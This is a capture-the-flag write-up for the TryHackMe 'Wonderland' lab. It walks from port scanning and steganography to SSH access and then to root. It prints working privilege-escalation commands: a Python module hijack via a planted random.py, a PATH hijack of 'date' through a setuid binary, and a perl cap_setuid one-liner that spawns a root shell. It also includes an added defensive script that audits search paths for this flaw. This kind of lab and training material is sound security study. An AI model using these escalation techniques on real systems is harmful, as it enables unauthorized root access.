Info
Name: Wonderland
Difficulty: Medium
Released: Fri 05 Jun 2020
Creator: NinjaJc01
URL: https://tryhackme.com/room/wonderland
Enumeration
As always, we start with an nmap scan of the machine:
nmap -sC -sV -oA nmap/all-tcp 10.10.167.35
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-05 23:56 CEST
Nmap scan report for 10.10.167.35
Host is up (0.046s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
| 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We only have two ports open: 22 and 80.
Visiting the web server reveals the following page:
We also do a directory scan with ffuf and find the following directories:
ffuf -u http://10.10.167.35/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
v1.1.0-git
________________________________________________
:: Method : GET
:: URL : http://10.10.167.35/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
img [Status: 301, Size: 0, Words: 1, Lines: 1]
poem [Status: 301, Size: 0, Words: 1, Lines: 1]
r [Status: 301, Size: 0, Words: 1, Lines: 1]
:: Progress: [20473/20473] :: Job [1/1] :: 853 req/sec :: Duration: [0:00:24] :: Errors: 0 ::
After looking at the different directories I didn't find anything of interest, so I decided to download the first image we found and see if something was hidden in it.
wget http://10.10.167.35/img/white_rabbit_1.jpg
--2020-06-06 00:04:02-- http://10.10.167.35/img/white_rabbit_1.jpg
Connecting to 10.10.167.35:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1993438 (1.9M) [image/jpeg]
Saving to: ‘white_rabbit_1.jpg’
white_rabbit_1.jpg 100%[==============================================================>] 1.90M 4.57MB/s in 0.4s
2020-06-06 00:04:02 (4.57 MB/s) - ‘white_rabbit_1.jpg’ saved [1993438/1993438]
steghide extract -sf white_rabbit_1.jpg
Enter passphrase:
wrote extracted data to "hint.txt".
s1gh@kali:~/TryHackMe/Wonderland/files$ cat hint.txt
follow the r a b b i t
My immediate thought was that r a b b i t might be pointing to a URL:
Looking at the source reveals something that looks like credentials:
We can now use the credentials above and SSH into the box.
Initial Foothold
We now have access to the machine, but by doing an ls -la we notice something weird: the root.txt file is located in our user's home directory...
ls -la
total 40
drwxr-xr-x 5 alice alice 4096 May 25 17:52 .
drwxr-xr-x 6 root root 4096 May 25 17:52 ..
lrwxrwxrwx 1 root root 9 May 25 17:52 .bash_history -> /dev/null
-rw-r--r-- 1 alice alice 220 May 25 02:36 .bash_logout
-rw-r--r-- 1 alice alice 3771 May 25 02:36 .bashrc
drwx------ 2 alice alice 4096 May 25 16:37 .cache
drwx------ 3 alice alice 4096 May 25 16:37 .gnupg
drwxrwxr-x 3 alice alice 4096 May 25 02:52 .local
-rw-r--r-- 1 alice alice 807 May 25 02:36 .profile
-rw------- 1 root root 66 May 25 17:08 root.txt
-rw-r--r-- 1 root root 3577 May 25 02:43 walrus_and_the_carpenter.py
After a bit of tinkering (and looking at the hint) we try to cat /root/user.txt.
cat /root/user.txt
thm{FLAG-REDACTED}
We finally have the user flag! Now, let's priv esc to root.
Privilege Escalation
Looking at our privileges with sudo -l reveals the following:
sudo -l
[sudo] password for alice:
Matching Defaults entries for alice on wonderland:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on wonderland:
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
We can run sudo /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py as the user rabbit.
Even though we only have read access to walrus_and_the_carpenter.py and can't edit the file, let's see what the file is doing when executed.
import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
The middle of the night.
The moon was shining sulkily,
Because she thought the sun
Had got no business to be there
After the day was done —
"It’s very rude of him," she said,
"To come and spoil the fun!"
The sea was wet as wet could be,
The sands were dry as dry.
You could not see a cloud, because
No cloud was in the sky:
No birds were flying over head —
There were no birds to fly.
The Walrus and the Carpenter
Were walking close at hand;
They wept like anything to see
Such quantities of sand:
"If this were only cleared away,"
They said, "it would be grand!"
[...]"""
for i in range(10):
    # pick ten random lines of the poem; the script prints them to the screen
    line = random.choice(poem.split("\n"))
    print(line)
Due to the length of the file, I've removed some of the poem that's printed to the screen when we're executing the file.
At the top of the file, we can see that the python module random is imported.
So, what if we create a file named random.py in our current working directory that executes /bin/bash? That way our python file should be loaded instead of the "real" random module, and in turn give us a shell as the rabbit user.
Our random.py:
import os
os.system("/bin/bash")
Executing the python script:
alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
rabbit@wonderland:~$ whoami
rabbit
Awesome! We have escalated our privileges to the rabbit user.
Looking in /home/rabbit/ we find a setuid binary, and by examining the file we see that date is executed without specifying an absolute path:
Welcome to the tea party!
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
We can abuse this by exporting our own $PATH, writing a small script called date and running the setuid binary.
Exporting our own $PATH:
rabbit@wonderland:/home/rabbit$ export PATH=/tmp:$PATH
rabbit@wonderland:/home/rabbit$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
Now, every time a program is called without specifying an absolute path, our shell will first look in /tmp.
Creating our malicious date file
We now create a shell script called date, place it in /tmp and make it executable with chmod +x /tmp/date.
rabbit@wonderland:/home/rabbit$ cat /tmp/date
#!/bin/bash
/bin/bash
All we now need to do is run the setuid binary and we should escalate to the user hatter.
rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$
hatter@wonderland:/home/rabbit$ whoami;id
hatter
uid=1003(hatter) gid=1002(rabbit) groups=1002(rabbit)
Awesome! We're getting close.
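Both escalations so far share one precondition: an ordered lookup (sys.path for import random, $PATH for the bare date) reaches a directory the low-privileged user can write before it reaches the trusted copy. Note that for python3 script.py the first sys.path entry is the script's own directory, /home/alice, which here happens to also be alice's working directory. The audit script below is an added example written from a defender's view, not code from the room or its author; the function names and the trusted_uid parameter are its own assumptions, and it checks a Python script's import path and a PATH string for exactly this condition.

```python
import os
import stat
import sys


def writable_by_untrusted(path, trusted_uid=0):
    """True if a user other than `trusted_uid` could create a file in `path`."""
    st = os.stat(path)
    if st.st_uid != trusted_uid and st.st_mode & stat.S_IWUSR:
        return True  # owned and writable by an untrusted user
    if st.st_gid != 0 and st.st_mode & stat.S_IWGRP:
        return True  # writable by a non-root group
    # World-writable: the sticky bit (as on /tmp) stops deleting others'
    # files but not creating a new `date` or `random.py` there.
    return bool(st.st_mode & stat.S_IWOTH)


def shadow_risk(search_path, name, trusted_uid=0):
    """Walk `search_path` in lookup order and return (directory, reason) for the
    first entry that lets an untrusted user satisfy the lookup of `name`.
    Returns None when a trusted copy is reached before any untrusted directory."""
    for entry in search_path:
        directory = entry or os.getcwd()  # an empty entry means the current directory
        if not os.path.isdir(directory):
            continue
        if os.path.exists(os.path.join(directory, name)):
            if writable_by_untrusted(directory, trusted_uid):
                return directory, "lookup resolves here and the directory is untrusted-writable"
            return None  # trusted copy found first; later entries are never consulted
        if writable_by_untrusted(directory, trusted_uid):
            return directory, "searched before the real copy and untrusted-writable"
    return None


def python_script_risk(script_path, module, trusted_uid=0):
    """`python3 script.py` puts the script's own directory at sys.path[0], ahead of
    the stdlib, which is why a random.py next to walrus_and_the_carpenter.py wins."""
    search = [os.path.dirname(os.path.abspath(script_path))] + sys.path[1:]
    return shadow_risk(search, module + ".py", trusted_uid)


def command_risk(command, path_env, trusted_uid=0):
    """The same walk for a bare command name against a $PATH string."""
    return shadow_risk(path_env.split(":"), command, trusted_uid)


if __name__ == "__main__":
    # Constructed input modelled on the writeup: /tmp prepended to the sudo secure_path.
    print(command_risk("date", "/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"))
```

On Python 3.11 and later, python3 -P (or PYTHONSAFEPATH=1) stops the interpreter from prepending the script directory to sys.path at all, which removes the import half of this problem outright.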
Looking in the home directory of the user hatter reveals a password in cleartext. Trying to ssh in with this password gives us a full shell as the user hatter:
ssh hatter@10.10.167.35
hatter@10.10.167.35's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Jun 5 22:48:04 UTC 2020
System load: 0.07 Processes: 95
Usage of /: 19.4% of 19.56GB Users logged in: 1
Memory usage: 32% IP address for eth0: 10.10.167.35
Swap usage: 0%
0 packages can be updated.
0 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Jun 5 22:47:57 2020 from 10.11.4.205
hatter@wonderland:~$ whoami;id
hatter
uid=1003(hatter) gid=1003(hatter) groups=1003(hatter)
Doing some basic enumeration reveals that perl has the following capability set: cap_setuid+ep
hatter@wonderland:/home/rabbit$ getcap -r / 2>/dev/null
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
We can easily abuse this and escalate to root!
hatter@wonderland:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# whoami;id
root
uid=0(root) gid=1003(hatter) groups=1003(hatter)
We can now finally get the root.txt flag as well!
# cat /home/alice/root.txt
thm{FLAG-REDACTED}